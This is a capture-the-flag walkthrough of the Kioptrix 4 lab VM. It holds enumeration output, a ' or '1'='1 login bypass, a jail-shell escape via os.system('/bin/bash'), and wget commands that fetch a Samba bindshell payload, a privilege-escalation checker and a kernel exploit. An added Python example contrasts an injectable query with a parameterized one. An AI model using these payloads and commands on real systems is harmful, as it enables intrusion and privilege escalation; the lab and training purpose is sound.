Kioptrix 4 Walkthrough
Started off with some standard enumeration of the IP, its services, and its web pages.
root@kali:~# netdiscover
Currently scanning: 192.168.68.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.50.91 00:0c:29:bf:e3:e7 1 60 VMware, Inc.
root@kali:~# ip=192.168.50.91
root@kali:~# nmap -T4 -sS -A $ip
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-06 05:30 EDT
Nmap scan report for 192.168.50.91
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BF:E3:E7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 10h00m01s, deviation: 2h49m42s, median: 8h00m01s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2019-05-06T13:30:59-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.50.91
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.57 seconds
root@kali:~# dirb http://$ip
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 6 05:31:28 2019
URL_BASE: http://192.168.50.91/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.91/ ----
+ http://192.168.50.91/cgi-bin/ (CODE:403|SIZE:328)
==> DIRECTORY: http://192.168.50.91/images/
+ http://192.168.50.91/index (CODE:200|SIZE:1255)
+ http://192.168.50.91/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.50.91/john/
+ http://192.168.50.91/logout (CODE:302|SIZE:0)
+ http://192.168.50.91/member (CODE:302|SIZE:220)
+ http://192.168.50.91/server-status (CODE:403|SIZE:333)
---- Entering directory: http://192.168.50.91/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.91/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon May 6 05:31:32 2019
DOWNLOADED: 4612 - FOUND: 6
Navigating to /john, I am presented with a listable directory, where I guessed that john was probably one of the usernames:
Heading back to the main page, I took a stab at the login with SQLi:
Surprisingly, that worked:
So that's the password for the web application, but it doesn't hurt to try the same password on the server itself; after all, people do reuse passwords:
Tried out some commands and received an error message:
Since we hadn't yet explored the SMB ports discovered earlier, I switched to that track and did further enumeration:
root@kali:~# nmap -script smb-enum-users.nse -script-args=unsafe=1 -p445,139 $ip
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-06 07:56 EDT
Nmap scan report for 192.168.50.91
Host is up (0.00058s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:E3:E7 (VMware)
Host script results:
| smb-enum-users:
| KIOPTRIX4\john (RID: 3002)
| Full name: ,,,
| Flags: Normal user account
| KIOPTRIX4\loneferret (RID: 3000)
| Full name: loneferret,,,
| Flags: Normal user account
| KIOPTRIX4\nobody (RID: 501)
| Full name: nobody
| Flags: Normal user account
| KIOPTRIX4\robert (RID: 3004)
| Full name: ,,,
| Flags: Normal user account
| KIOPTRIX4\root (RID: 1000)
| Full name: root
|_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
So apart from john, we now have loneferret, nobody, robert, and root.
Using the same SQLi method, ' or '1'='1, with the other usernames, this is what I got:
Just to make sure there wasn't any hidden text behind that padded password, I tried decoding it as base64:
root@kali:~# echo ADGAdsafdfwt4gadfga== | base64 -d
1�vƟu�-��~base64: invalid input
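The login bypass used above, as an added example that is not part of the original walkthrough: the string-built query that the payload breaks, beside the parameterized query that closes the hole, run against a constructed in-memory SQLite table (the members table, user names and passwords here are made up, not the VM's).

```python
# Added example, not code from the Kioptrix 4 VM or the walkthrough.
# Reproduces the ' or '1'='1 bypass against a throwaway SQLite table and
# shows the parameterized query that is immune to it.
import sqlite3

PAYLOAD = "' or '1'='1"   # the injection string typed into the login form above


def make_db() -> sqlite3.Connection:
    """Build a constructed members table; names and passwords are sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?)",
        [("john", "example-password-1"), ("robert", "example-password-2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Query assembled by string formatting: quotes in user input become SQL.
    Returns the username of the first matching row, or None."""
    sql = ("SELECT username FROM members WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    # With PAYLOAD as the password the WHERE clause becomes
    #   username = '<user>' AND password = '' or '1'='1'
    # AND binds tighter than OR, so the trailing '1'='1' matches every row.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes the input as a literal string,
    so the quotes in PAYLOAD are compared, never parsed."""
    row = conn.execute(
        "SELECT username FROM members WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The username does not even need to exist for the bypass to succeed.
    print("vulnerable:", login_vulnerable(db, "nosuchuser", PAYLOAD))  # john
    print("safe:      ", login_safe(db, "nosuchuser", PAYLOAD))        # None
```

In the web application on the VM the first matching row is what gets shown, which is why the page then displayed other members' password fields when their names were used.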
Using the password above, I’m in:
My attempt to find SMB vulnerabilities wasn't very fruitful, so I enumerated the shares with the credentials I had:
root@kali:~# nmap -script smb-vuln-* -script-args=unsafe=1 -p445,139 $ip
root@kali:~# nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=john,smbpass=MyNameIsJohn -p445 $ip
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-06 08:23 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.00s elapsed
Initiating ARP Ping Scan at 08:23
Scanning 192.168.50.91 [1 port]
Completed ARP Ping Scan at 08:23, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:23
Completed Parallel DNS resolution of 1 host. at 08:23, 0.01s elapsed
Initiating SYN Stealth Scan at 08:23
Scanning 192.168.50.91 [1 port]
Discovered open port 445/tcp on 192.168.50.91
Completed SYN Stealth Scan at 08:23, 0.07s elapsed (1 total ports)
NSE: Script scanning 192.168.50.91.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.82s elapsed
Nmap scan report for 192.168.50.91
Host is up (0.00066s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:E3:E7 (VMware)
Host script results:
| smb-enum-shares:
| account_used: john
| \\192.168.50.91\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.50.91\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: READ
Let's take a stab at the SMB share listing:
root@kali:~# smbclient -L //192.168.50.91/IPC$
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
I tried an RCE exploit for the Samba service (CVE-2017-7494) from https://www.exploit-db.com/exploits/42060, but it didn't work:
root@kali:~# sudo apt-get install python3-smb
root@kali:~# wget https://github.com/opsxcq/exploit-CVE-2017-7494/blob/master/libbindshell-samba.so
root@kali:~# python3 rce.py /root/libbindshell-samba.so 192.168.50.91 -p 445 -u guest
Traceback (most recent call last):
File "rce1.py", line 468, in <module>
main()
File "rce1.py", line 463, in main
fullpath = drop_payload(user, password, args.server, port, args.payload)
File "rce1.py", line 399, in drop_payload
shares = get_share_info(conn)
File "rce1.py", line 352, in get_share_info
return conn.listShares()
File "/usr/lib/python3/dist-packages/smb/SMBConnection.py", line 149, in listShares
self._pollForNetBIOSPacket(timeout)
File "/usr/lib/python3/dist-packages/smb/SMBConnection.py", line 545, in _pollForNetBIOSPacket
raise NotConnectedError
smb.base.NotConnectedError
I went back to the limited shell on the target server to review again:
echo seems like the most probable command for escaping the limited shell, so I tried some options, but they didn't work:
With some googling, I found a post on breaking out of a jail shell (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/), which uses echo os.system('/bin/bash'):
Navigating to loneferret's directory, we see that while robert and john do not have sudo rights, loneferret seems to:
Scouting around, I landed on crontab:
I decided to let scripts do the work:
robert@Kioptrix4:~$ wget https://www.securitysift.com/download/linuxprivchecker.py --no-check-certificate
robert@Kioptrix4:~$ python linuxprivchecker.py
(Concurrently, I took a long shot at brute-forcing the root SSH password with hydra, which didn't work out.)
I tried almost all the exploits suggested by the script. As there was no gcc compiler on the target server, I tried the bash exploit first, which didn't work out. I also avoided Dirty COW because I've read that it won't work on OSCP exams, and so I wanted to find another way.
I then tried compiling on my Kali machine, hosting the binary on my web server and downloading it from the target server, but the download didn't work for some reason. I also tried compiling online and wget-ing the compiled file directly:
But again, the target server couldn't download from the above link. With that, I was left with ftp or scp, and, being lazy, I chose the more insecure scp method of file transfer and went through the exploits above one by one; lo and behold:
root@kali:~# wget https://www.exploit-db.com/download/9545 -O 9545.c
--2019-05-08 11:45:01-- https://www.exploit-db.com/download/9545
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘9545.c’

9545.c [ <=> ] 9.55K --.-KB/s in 0s

2019-05-08 11:45:02 (67.7 MB/s) - ‘9545.c’ saved [9783]

root@kali:~# gcc -o 9545 9545.c
I was stuck at the limited shell and at privilege escalation for some time, and I'm pretty sure that in the end I took a different route from other players.